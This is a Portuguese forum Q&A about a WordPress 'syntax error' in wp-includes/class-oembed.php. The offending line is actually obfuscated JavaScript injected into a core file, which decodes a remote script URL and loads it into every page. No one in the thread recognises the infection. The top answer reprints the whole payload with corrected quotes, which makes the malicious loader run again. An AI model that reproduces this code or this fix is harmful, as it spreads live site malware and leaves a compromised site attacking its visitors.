# Erro de syntax no wordpress

Tags: php, wordpress

Meu site esta fora do ar

> Wordpress erro: HTTP ERROR 500
>
> [29-Nov-2018 18:14:24 UTC] PHP Parse error:  syntax error, unexpected 'text' (T_STRING) in /home/mysite/public_html/wp-includes/class-oembed.php on line 421

Esta é a `Line 421 do calss-oembed.php`:

```
        // Strip <body>
        if ( $html_head_end = stripos( $html, '<script type='text/javascript'>var _0x1e38=['length','fromCharCode','createElement','type','async','code125','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e38,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e38[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 119, 97, 114, 100, 109, 121, 116, 114, 97, 102, 102, 105, 99, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 112, 111, 114, 116, 61, 52, 52);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></head>' ) ) {
            $html = substr( $html, 0, $html_head_end );
        }
```

Como posso resolver?

Comment: Este erro, comum, ocorre quando aspas se encontram em uma cadeia delimitada pelo mesmo tipo de aspas. [fonte](https://br.ccm.net/faq/9090-php-parse-error-unexpected-t-string-expecting-or)

Answer (score 2):

Pelo código que você postou parece esta com erro no caractere `'`.

`'<script type='text/javascript'>.....'`, ele esta abrindo string no primeiro `'` e fechando a string antes do `text/javascript` e reabrindo string após, e continua.

aparentemente se você trocar `'` inicial e final por `"` deve funcionar

```
if ( $html_head_end = stripos( $html, "<script type='text/javascript'>var _0x1e38=['length','fromCharCode','createElement','type','async','code125','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e38,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e38[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 119, 97, 114, 100, 109, 121, 116, 114, 97, 102, 102, 105, 99, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 112, 111, 114, 116, 61, 52, 52);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></head>" ) ) {
    $html = substr( $html, 0, $html_head_end );
}
```

Answer (score 0):

Muda de:

```
if ( $html_head_end = stripos( $html, '/** js */' ) ) {
```

para:

```
if ( $html_head_end = stripos( $html, "/** js */" ) ) {
```

Como o código js usa ' o php não sabe se tu ta querendo fecha a string do php ou abrir a string no js.